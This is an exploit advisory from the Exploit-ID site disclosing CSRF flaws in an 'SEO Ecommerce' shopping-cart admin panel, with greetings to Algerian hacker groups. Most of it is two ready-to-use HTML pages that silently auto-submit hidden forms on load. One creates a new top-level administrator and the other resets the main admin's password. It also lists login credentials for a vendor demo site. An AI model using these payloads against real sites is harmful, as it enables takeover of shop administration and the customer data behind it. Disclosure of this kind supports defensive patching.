=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure
Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: SEO Ecommerce(Shopping)<= Multiple XSRF/CSRF Vulnerabilities
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com | Caddy-Dz@exploit-id.com
# Website: www.exploit-id.com
# Category:: webapps
# Price: $ 95
# Tested on: [Windows Vista Edition Intégrale]
####
||> Demo: | User:demoadmin / Pass:admin@tipl
http://demo.truworthit.com/shoppingcart/admin/
[*] ~~ Update User ~~
~~~~~~~~~~~~~
<html>
<head>
<title>SEO Ecommerce Software</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<form action="http://127.0.0.1/admin/index.php?controller=user&action=insert" method="post" enctype="multipart/form-data" id="form">
<input type="hidden" name="username" value="test">
<input type="hidden" name="firstname" value="test">
<input type="hidden" name="lastname" value="test">
<input type="hidden" name="email" value="anil@trrthit.com"></td>
<option value="1" selected>Top Administrator</option>
<option value="2">Demonstration</option>
<input type="hidden" name="password" value="test" >
<input type="hidden" name="confirm" value="test">
</form>
[*] ~~ Add New Admin ~~
~~~~~~~~~~~~~~~
[+] |> Just edit the form link to: /shoppingcart/admin/index.php?controller=user&user_id=1&action=update" method="post" enctype="multipart/form-data" id="form">
<html>
<head>
<title>SEO Ecommerce Software</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<form action="http://127.0.0.1/shoppingcart/admin/index.php?controller=user&user_id=1&action=update" method="post" enctype="multipart/form-data" id="form">
<input type="hidden" name="username" value="demoadmin">
<input type="hidden" name="firstname" value="truworth">
<input type="hidden" name="lastname" value="truworth">
<input type="hidden" name="email" value="anil@truworthit.com"></td>
<option value="1" selected>Top Administrator</option>
<option value="2">Demonstration</option>
<input type="hidden" name="password" value="test" >
<input type="hidden" name="confirm" value="test">
</form>
####
Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team , Kalashinkov3 ,|
, (exploit-id.com) , (1337day.com) , (09exploit.com) , |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
============================================================================================ |
